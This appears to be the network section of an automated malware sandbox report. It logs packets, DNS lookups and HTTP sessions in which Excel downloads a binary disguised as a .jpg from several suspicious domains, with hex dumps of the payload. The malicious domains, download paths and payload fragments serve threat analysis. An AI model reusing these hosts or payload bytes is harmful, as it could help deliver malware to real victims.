                                                                                                                                                                                                  Jul 6, 2021 15:12:30.995686054 CEST4434917213.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:30.995738029 CEST4434917213.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:30.995959997 CEST49172443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:30.996830940 CEST4434917213.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:30.996854067 CEST4434917213.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:30.996975899 CEST49172443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:30.999393940 CEST4434917213.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:30.999517918 CEST4434917213.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:30.999665976 CEST49172443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:31.003235102 CEST4434917213.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:31.003269911 CEST4434917213.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:31.003293037 CEST4434917213.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:31.003312111 CEST4434917213.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:31.003338099 CEST49172443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:31.003366947 CEST49172443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:31.004678965 CEST4434917213.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:31.004714012 CEST4434917213.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:31.004852057 CEST49172443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:31.006395102 CEST4434917213.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:31.006424904 CEST4434917213.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:31.006450891 CEST4434917213.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:31.006460905 CEST49172443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:31.006825924 CEST4434917213.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:31.006853104 CEST4434917213.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:31.006875038 CEST49172443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:31.008008003 CEST4434917213.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:31.008050919 CEST4434917213.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:31.008147955 CEST49172443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:31.009243965 CEST4434917213.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:31.009313107 CEST4434917213.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:31.009335041 CEST49172443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:31.012332916 CEST4434917213.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:31.012381077 CEST4434917213.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:31.012413025 CEST49172443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:31.058145046 CEST49172443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:31.096858025 CEST4434917213.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:31.096909046 CEST4434917213.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:31.096950054 CEST4434917213.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:31.096986055 CEST4434917213.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:31.097018003 CEST4434917213.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:31.097050905 CEST4434917213.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:31.097230911 CEST49172443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:31.097253084 CEST49172443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:31.097255945 CEST49172443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:31.097681046 CEST4434917213.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:31.097717047 CEST4434917213.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:31.097744942 CEST4434917213.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:31.098155975 CEST49172443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:31.098630905 CEST4434917213.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:31.098690987 CEST4434917213.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:31.098735094 CEST4434917213.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:31.099472046 CEST4434917213.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:31.099499941 CEST4434917213.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:31.099517107 CEST49172443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:31.099549055 CEST49172443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:31.230747938 CEST4917180192.168.2.22104.21.37.209
                                                                                                                                                                                                  Jul 6, 2021 15:12:31.231028080 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:31.253277063 CEST4917380192.168.2.22104.21.37.209
                                                                                                                                                                                                  Jul 6, 2021 15:12:31.291825056 CEST8049173104.21.37.209192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:31.291897058 CEST4917380192.168.2.22104.21.37.209
                                                                                                                                                                                                  Jul 6, 2021 15:12:31.292399883 CEST4917380192.168.2.22104.21.37.209
                                                                                                                                                                                                  Jul 6, 2021 15:12:31.331479073 CEST8049173104.21.37.209192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:31.803194046 CEST8049173104.21.37.209192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:31.803231001 CEST8049173104.21.37.209192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:31.803318024 CEST4917380192.168.2.22104.21.37.209
                                                                                                                                                                                                  Jul 6, 2021 15:12:33.411614895 CEST4917380192.168.2.22104.21.37.209
                                                                                                                                                                                                  Jul 6, 2021 15:12:33.411752939 CEST49172443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:14:20.269253016 CEST4916780192.168.2.22104.21.55.83
                                                                                                                                                                                                  Jul 6, 2021 15:14:20.269767046 CEST4916680192.168.2.22172.67.194.117
                                                                                                                                                                                                  Jul 6, 2021 15:14:20.270422935 CEST4916580192.168.2.22172.67.198.51
                                                                                                                                                                                                  Jul 6, 2021 15:14:20.307924032 CEST8049166172.67.194.117192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:14:20.308090925 CEST4916680192.168.2.22172.67.194.117
                                                                                                                                                                                                  Jul 6, 2021 15:14:20.309639931 CEST8049165172.67.198.51192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:14:20.309844971 CEST4916580192.168.2.22172.67.198.51
                                                                                                                                                                                                  Jul 6, 2021 15:14:20.310702085 CEST8049167104.21.55.83192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:14:20.310909033 CEST4916780192.168.2.22104.21.55.83

                                                                                                                                                                                                  UDP Packets

                                                                                                                                                                                                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                  Jul 6, 2021 15:12:31.186435938 CEST5977053192.168.2.228.8.8.8
                                                                                                                                                                                                  Jul 6, 2021 15:12:31.251311064 CEST53597708.8.8.8192.168.2.22

                                                                                                                                                                                                  DNS Queries

| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
|---|---|---|---|---|---|---|---|
| Jul 6, 2021 15:12:20.311832905 CEST | 192.168.2.22 | 8.8.8.8 | 0xccae | Standard query (0) | thousandsyears.download | A (IP address) | IN (0x0001) |
| Jul 6, 2021 15:12:20.585585117 CEST | 192.168.2.22 | 8.8.8.8 | 0x3dfe | Standard query (0) | voopeople.fun | A (IP address) | IN (0x0001) |
| Jul 6, 2021 15:12:20.828290939 CEST | 192.168.2.22 | 8.8.8.8 | 0x315e | Standard query (0) | uppercilio.fun | A (IP address) | IN (0x0001) |
| Jul 6, 2021 15:12:21.583837032 CEST | 192.168.2.22 | 8.8.8.8 | 0xa3a3 | Standard query (0) | aws.amazon.com | A (IP address) | IN (0x0001) |
| Jul 6, 2021 15:12:21.677966118 CEST | 192.168.2.22 | 8.8.8.8 | 0x4023 | Standard query (0) | aws.amazon.com | A (IP address) | IN (0x0001) |
| Jul 6, 2021 15:12:23.765743017 CEST | 192.168.2.22 | 8.8.8.8 | 0xb163 | Standard query (0) | astrocycle.download | A (IP address) | IN (0x0001) |
| Jul 6, 2021 15:12:23.829664946 CEST | 192.168.2.22 | 8.8.8.8 | 0xcc9c | Standard query (0) | astrocycle.download | A (IP address) | IN (0x0001) |
| Jul 6, 2021 15:12:26.016415119 CEST | 192.168.2.22 | 8.8.8.8 | 0xc330 | Standard query (0) | aws.amazon.com | A (IP address) | IN (0x0001) |
| Jul 6, 2021 15:12:26.091170073 CEST | 192.168.2.22 | 8.8.8.8 | 0x6848 | Standard query (0) | aws.amazon.com | A (IP address) | IN (0x0001) |
| Jul 6, 2021 15:12:27.643636942 CEST | 192.168.2.22 | 8.8.8.8 | 0x8766 | Standard query (0) | astrocycle.download | A (IP address) | IN (0x0001) |
| Jul 6, 2021 15:12:27.711291075 CEST | 192.168.2.22 | 8.8.8.8 | 0x4177 | Standard query (0) | astrocycle.download | A (IP address) | IN (0x0001) |
| Jul 6, 2021 15:12:29.363607883 CEST | 192.168.2.22 | 8.8.8.8 | 0x96ce | Standard query (0) | aws.amazon.com | A (IP address) | IN (0x0001) |
| Jul 6, 2021 15:12:29.486850977 CEST | 192.168.2.22 | 8.8.8.8 | 0x45a5 | Standard query (0) | aws.amazon.com | A (IP address) | IN (0x0001) |
| Jul 6, 2021 15:12:31.122390985 CEST | 192.168.2.22 | 8.8.8.8 | 0xbb9f | Standard query (0) | astrocycle.download | A (IP address) | IN (0x0001) |
| Jul 6, 2021 15:12:31.186435938 CEST | 192.168.2.22 | 8.8.8.8 | 0xa14d | Standard query (0) | astrocycle.download | A (IP address) | IN (0x0001) |

                                                                                                                                                                                                  DNS Answers

| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
|---|---|---|---|---|---|---|---|---|---|
| Jul 6, 2021 15:12:20.375283957 CEST | 8.8.8.8 | 192.168.2.22 | 0xccae | No error (0) | thousandsyears.download | | 172.67.198.51 | A (IP address) | IN (0x0001) |
| Jul 6, 2021 15:12:20.375283957 CEST | 8.8.8.8 | 192.168.2.22 | 0xccae | No error (0) | thousandsyears.download | | 104.21.52.111 | A (IP address) | IN (0x0001) |
| Jul 6, 2021 15:12:20.647394896 CEST | 8.8.8.8 | 192.168.2.22 | 0x3dfe | No error (0) | voopeople.fun | | 172.67.194.117 | A (IP address) | IN (0x0001) |
| Jul 6, 2021 15:12:20.647394896 CEST | 8.8.8.8 | 192.168.2.22 | 0x3dfe | No error (0) | voopeople.fun | | 104.21.12.122 | A (IP address) | IN (0x0001) |
| Jul 6, 2021 15:12:20.886183977 CEST | 8.8.8.8 | 192.168.2.22 | 0x315e | No error (0) | uppercilio.fun | | 104.21.55.83 | A (IP address) | IN (0x0001) |
| Jul 6, 2021 15:12:20.886183977 CEST | 8.8.8.8 | 192.168.2.22 | 0x315e | No error (0) | uppercilio.fun | | 172.67.146.88 | A (IP address) | IN (0x0001) |
| Jul 6, 2021 15:12:21.651139975 CEST | 8.8.8.8 | 192.168.2.22 | 0xa3a3 | No error (0) | aws.amazon.com | tp.8e49140c2-frontier.amazon.com | | CNAME (Canonical name) | IN (0x0001) |
| Jul 6, 2021 15:12:21.651139975 CEST | 8.8.8.8 | 192.168.2.22 | 0xa3a3 | No error (0) | tp.8e49140c2-frontier.amazon.com | dr49lng3n1n2s.cloudfront.net | | CNAME (Canonical name) | IN (0x0001) |
| Jul 6, 2021 15:12:21.651139975 CEST | 8.8.8.8 | 192.168.2.22 | 0xa3a3 | No error (0) | dr49lng3n1n2s.cloudfront.net | | 13.224.92.73 | A (IP address) | IN (0x0001) |
| Jul 6, 2021 15:12:21.740823984 CEST | 8.8.8.8 | 192.168.2.22 | 0x4023 | No error (0) | aws.amazon.com | tp.8e49140c2-frontier.amazon.com | | CNAME (Canonical name) | IN (0x0001) |
| Jul 6, 2021 15:12:21.740823984 CEST | 8.8.8.8 | 192.168.2.22 | 0x4023 | No error (0) | tp.8e49140c2-frontier.amazon.com | dr49lng3n1n2s.cloudfront.net | | CNAME (Canonical name) | IN (0x0001) |
| Jul 6, 2021 15:12:21.740823984 CEST | 8.8.8.8 | 192.168.2.22 | 0x4023 | No error (0) | dr49lng3n1n2s.cloudfront.net | | 13.224.92.73 | A (IP address) | IN (0x0001) |
| Jul 6, 2021 15:12:23.820565939 CEST | 8.8.8.8 | 192.168.2.22 | 0xb163 | No error (0) | astrocycle.download | | 172.67.213.115 | A (IP address) | IN (0x0001) |
| Jul 6, 2021 15:12:23.820565939 CEST | 8.8.8.8 | 192.168.2.22 | 0xb163 | No error (0) | astrocycle.download | | 104.21.37.209 | A (IP address) | IN (0x0001) |
| Jul 6, 2021 15:12:23.887166023 CEST | 8.8.8.8 | 192.168.2.22 | 0xcc9c | No error (0) | astrocycle.download | | 172.67.213.115 | A (IP address) | IN (0x0001) |
| Jul 6, 2021 15:12:23.887166023 CEST | 8.8.8.8 | 192.168.2.22 | 0xcc9c | No error (0) | astrocycle.download | | 104.21.37.209 | A (IP address) | IN (0x0001) |
| Jul 6, 2021 15:12:26.070559978 CEST | 8.8.8.8 | 192.168.2.22 | 0xc330 | No error (0) | aws.amazon.com | tp.8e49140c2-frontier.amazon.com | | CNAME (Canonical name) | IN (0x0001) |
| Jul 6, 2021 15:12:26.070559978 CEST | 8.8.8.8 | 192.168.2.22 | 0xc330 | No error (0) | tp.8e49140c2-frontier.amazon.com | dr49lng3n1n2s.cloudfront.net | | CNAME (Canonical name) | IN (0x0001) |
| Jul 6, 2021 15:12:26.070559978 CEST | 8.8.8.8 | 192.168.2.22 | 0xc330 | No error (0) | dr49lng3n1n2s.cloudfront.net | | 13.224.92.73 | A (IP address) | IN (0x0001) |
| Jul 6, 2021 15:12:26.145395041 CEST | 8.8.8.8 | 192.168.2.22 | 0x6848 | No error (0) | aws.amazon.com | tp.8e49140c2-frontier.amazon.com | | CNAME (Canonical name) | IN (0x0001) |
| Jul 6, 2021 15:12:26.145395041 CEST | 8.8.8.8 | 192.168.2.22 | 0x6848 | No error (0) | tp.8e49140c2-frontier.amazon.com | dr49lng3n1n2s.cloudfront.net | | CNAME (Canonical name) | IN (0x0001) |
| Jul 6, 2021 15:12:26.145395041 CEST | 8.8.8.8 | 192.168.2.22 | 0x6848 | No error (0) | dr49lng3n1n2s.cloudfront.net | | 13.224.92.73 | A (IP address) | IN (0x0001) |
| Jul 6, 2021 15:12:27.703924894 CEST | 8.8.8.8 | 192.168.2.22 | 0x8766 | No error (0) | astrocycle.download | | 104.21.37.209 | A (IP address) | IN (0x0001) |
| Jul 6, 2021 15:12:27.703924894 CEST | 8.8.8.8 | 192.168.2.22 | 0x8766 | No error (0) | astrocycle.download | | 172.67.213.115 | A (IP address) | IN (0x0001) |
| Jul 6, 2021 15:12:27.766550064 CEST | 8.8.8.8 | 192.168.2.22 | 0x4177 | No error (0) | astrocycle.download | | 104.21.37.209 | A (IP address) | IN (0x0001) |
| Jul 6, 2021 15:12:27.766550064 CEST | 8.8.8.8 | 192.168.2.22 | 0x4177 | No error (0) | astrocycle.download | | 172.67.213.115 | A (IP address) | IN (0x0001) |
| Jul 6, 2021 15:12:29.418677092 CEST | 8.8.8.8 | 192.168.2.22 | 0x96ce | No error (0) | aws.amazon.com | tp.8e49140c2-frontier.amazon.com | | CNAME (Canonical name) | IN (0x0001) |
| Jul 6, 2021 15:12:29.418677092 CEST | 8.8.8.8 | 192.168.2.22 | 0x96ce | No error (0) | tp.8e49140c2-frontier.amazon.com | dr49lng3n1n2s.cloudfront.net | | CNAME (Canonical name) | IN (0x0001) |
| Jul 6, 2021 15:12:29.418677092 CEST | 8.8.8.8 | 192.168.2.22 | 0x96ce | No error (0) | dr49lng3n1n2s.cloudfront.net | | 13.224.92.73 | A (IP address) | IN (0x0001) |
| Jul 6, 2021 15:12:29.541831970 CEST | 8.8.8.8 | 192.168.2.22 | 0x45a5 | No error (0) | aws.amazon.com | tp.8e49140c2-frontier.amazon.com | | CNAME (Canonical name) | IN (0x0001) |
| Jul 6, 2021 15:12:29.541831970 CEST | 8.8.8.8 | 192.168.2.22 | 0x45a5 | No error (0) | tp.8e49140c2-frontier.amazon.com | dr49lng3n1n2s.cloudfront.net | | CNAME (Canonical name) | IN (0x0001) |
| Jul 6, 2021 15:12:29.541831970 CEST | 8.8.8.8 | 192.168.2.22 | 0x45a5 | No error (0) | dr49lng3n1n2s.cloudfront.net | | 13.224.92.73 | A (IP address) | IN (0x0001) |
| Jul 6, 2021 15:12:31.178709030 CEST | 8.8.8.8 | 192.168.2.22 | 0xbb9f | No error (0) | astrocycle.download | | 104.21.37.209 | A (IP address) | IN (0x0001) |
| Jul 6, 2021 15:12:31.178709030 CEST | 8.8.8.8 | 192.168.2.22 | 0xbb9f | No error (0) | astrocycle.download | | 172.67.213.115 | A (IP address) | IN (0x0001) |
| Jul 6, 2021 15:12:31.251311064 CEST | 8.8.8.8 | 192.168.2.22 | 0xa14d | No error (0) | astrocycle.download | | 172.67.213.115 | A (IP address) | IN (0x0001) |
| Jul 6, 2021 15:12:31.251311064 CEST | 8.8.8.8 | 192.168.2.22 | 0xa14d | No error (0) | astrocycle.download | | 104.21.37.209 | A (IP address) | IN (0x0001) |

                                                                                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                                                                                  • thousandsyears.download
                                                                                                                                                                                                  • voopeople.fun
                                                                                                                                                                                                  • uppercilio.fun
                                                                                                                                                                                                  • astrocycle.download

                                                                                                                                                                                                  HTTP Packets

| Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
|---|---|---|---|---|---|
| 0 | 192.168.2.22 | 49165 | 172.67.198.51 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |

Timestamp | kBytes transferred | Direction | Data
Jul 6, 2021 15:12:20.430273056 CEST | 0 | OUT | GET /div/44376,8555986111.jpg HTTP/1.1
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  UA-CPU: AMD64
                                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                                  Host: thousandsyears.download
                                                                                                                                                                                                  Connection: Keep-Alive
Jul 6, 2021 15:12:20.506335974 CEST | 2 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                  Date: Tue, 06 Jul 2021 13:12:20 GMT
                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                  Content-Length: 57856
                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                  Content-Disposition: attachment; filename=lsdfik.fml
                                                                                                                                                                                                  Cache-Control: max-age=14400
                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                  Age: 4570
                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=O0dc7lvLICauGXDuIZ%2BlUJ0czK0%2FHrzDaLd78hxuxDslW%2FEG7dUbO8GtBLbuhCTL9p3xRamKpR049uJzRM%2F%2BPaEAQMK2guwOR06G7FUf9ZRr7bwsf%2FtO4ngVq0uKYPxd5lcxgN4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                  NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                  CF-RAY: 66a91587ef2a4a9e-FRA
                                                                                                                                                                                                  alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                                  Data Ascii: $H$L$AH(ALHT$PHT$PH$H$$H|$P'HD$PH$HGL$(HDD$(E1H$H$TE1DHD$@HD$@H$H$$H;L$@qH$H$H$$HL$@DLH
                                                                                                                                                                                                  Jul 6, 2021 15:12:20.506489992 CEST11INData Raw: 00 0f 85 9e 00 00 00 8b 44 24 60 89 84 24 44 01 00 00 48 8b 4c 24 38 0f b7 41 16 83 e0 01 83 f8 00 0f 84 31 00 00 00 8b 44 24 60 89 84 24 40 01 00 00 c6 44 24 67 00 48 8b 4c 24 68 48 89 8c 24 30 01 00 00 48 8b 8c 24 30 01 00 00 89 8c 24 3c 01 00
                                                                                                                                                                                                  Data Ascii: D$`$DHL$8A1D$`$@D$gHL$hH$0H$0$<=HD$hH$ H$ $,D$gHL$hH$H$$D$`$HD$hH$H$$|$`MD$`$HL$@AD$TD$T$D$T
                                                                                                                                                                                                  Jul 6, 2021 15:12:20.506510973 CEST13INData Raw: 39 00 0f 84 86 00 00 00 48 8b 44 24 50 48 89 84 24 70 01 00 00 48 8b 84 24 70 01 00 00 89 84 24 7c 01 00 00 48 8b 4c 24 68 8b 01 89 c1 48 03 8c 24 88 00 00 00 48 89 4c 24 58 48 8b 4c 24 58 48 89 8c 24 60 01 00 00 48 8b 8c 24 60 01 00 00 89 8c 24
                                                                                                                                                                                                  Data Ascii: 9HD$PH$pH$p$|HL$hH$HL$XHL$XH$`H$`$lHT$hBH$HT$@HT$@H$PH$P$\hH$$LHL$hAH$HL$XHL$XH$@H$@$HHT$XHT$@HT$@H$0H$0$<
                                                                                                                                                                                                  Jul 6, 2021 15:12:20.506531954 CEST14INData Raw: 45 89 c1 46 0f b7 04 4a 44 89 c2 44 8b 04 91 44 89 c1 48 01 c8 48 89 44 24 30 48 8b 44 24 30 48 89 84 24 80 00 00 00 e9 70 00 00 00 48 8b 44 24 68 48 89 84 24 b8 00 00 00 48 8b 84 24 b8 00 00 00 89 84 24 c4 00 00 00 8b 44 24 4c 83 c0 01 89 44 24
                                                                                                                                                                                                  Data Ascii: EFJDDDHHD$0HD$0H$pHD$hH$H$$D$LD$LHD$hH$H$$HD$hH$H$$H$H$HH$LL$`DD$\T$[HL$PD$<HL$PHL$pHL$pL$|HL$P
                                                                                                                                                                                                  Jul 6, 2021 15:12:20.507344007 CEST16INData Raw: 89 4c 24 30 48 8b 4c 24 30 48 89 8c 24 a0 00 00 00 48 8b 8c 24 a0 00 00 00 89 8c 24 ac 00 00 00 e9 63 ff ff ff 48 8b 44 24 30 48 89 84 24 90 00 00 00 48 8b 84 24 90 00 00 00 89 84 24 9c 00 00 00 48 8b 44 24 50 48 89 84 24 80 00 00 00 48 8b 84 24
                                                                                                                                                                                                  Data Ascii: L$0HL$0H$H$$cHD$0H$H$$HD$PH$H$$HD$hHD$hHHHT$HL$HD$HD$ HD$ D$,HL$H$H$$HD$H$H$$HL$HHHT$D$HL$


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.22 | 49166 | 172.67.194.117 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Timestamp | kBytes transferred | Direction | Data
Jul 6, 2021 15:12:20.691818953 CEST | 63 | OUT | GET /div/44376,8555986111.jpg HTTP/1.1
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  UA-CPU: AMD64
                                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                                  Host: voopeople.fun
                                                                                                                                                                                                  Connection: Keep-Alive
Jul 6, 2021 15:12:20.766729116 CEST | 64 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                  Date: Tue, 06 Jul 2021 13:12:20 GMT
                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                  Content-Length: 57856
                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                  Content-Disposition: attachment; filename=lsdfik.fml
                                                                                                                                                                                                  Cache-Control: max-age=14400
                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                  Age: 4569
                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=d%2BaXch2L3fd900zKjzyYSRfC9hQVPWG3n4OZYVEj39RvIOnQ1%2Fa8iGrhk9uRSqSlCiC1SigaLdQfqr0oQ0gBrEPc4nhFAbBdmpUQpqqW7Ea51Pqhc0o5X6y1jw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                  NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                  CF-RAY: 66a915898a8f4e2b-FRA
                                                                                                                                                                                                  alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.22 | 49167 | 104.21.55.83 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Timestamp | kBytes transferred | Direction | Data
Jul 6, 2021 15:12:20.932414055 CEST | 125 | OUT | GET /div/44376,8555986111.jpg HTTP/1.1
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  UA-CPU: AMD64
                                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                                  Host: uppercilio.fun
                                                                                                                                                                                                  Connection: Keep-Alive
Jul 6, 2021 15:12:20.996679068 CEST | 126 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                  Date: Tue, 06 Jul 2021 13:12:20 GMT
                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                  Content-Length: 57856
                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                  Content-Disposition: attachment; filename=lsdfik.fml
                                                                                                                                                                                                  Cache-Control: max-age=14400
                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                  Age: 4568
                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=TcxOBI3LE7hks3UaLOzUCmei%2B3AhO5N50KzVCQZzFU1dHMyrurpRjRiizcjGmU0Vvk2hCVFbxSnz%2FlI9j7iM2llIWQNg49350wtmQZK7MwLZo2PMqLP68%2BaJ5mQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                  NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                  CF-RAY: 66a9158b08f1177a-FRA
                                                                                                                                                                                                  alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                                  Data Ascii: AH(ALHT$PHT$PH$H$$H|$P'HD$PH$HGL$(HDD$(E1H$H$TE1DHD$@HD$@H$H$$H;L$@qH$H$H$$HL$@DLHLHL$ L
                                                                                                                                                                                                  Jul 6, 2021 15:12:20.996804953 CEST136INData Raw: 48 8b 4c 24 38 0f b7 41 16 83 e0 01 83 f8 00 0f 84 31 00 00 00 8b 44 24 60 89 84 24 40 01 00 00 c6 44 24 67 00 48 8b 4c 24 68 48 89 8c 24 30 01 00 00 48 8b 8c 24 30 01 00 00 89 8c 24 3c 01 00 00 e9 3d 00 00 00 48 8b 44 24 68 48 89 84 24 20 01 00
                                                                                                                                                                                                  Data Ascii: HL$8A1D$`$@D$gHL$hH$0H$0$<=HD$hH$ H$ $,D$gHL$hH$H$$D$`$HD$hH$H$$|$`MD$`$HL$@AD$TD$T$D$TT$`)T$`D$`$
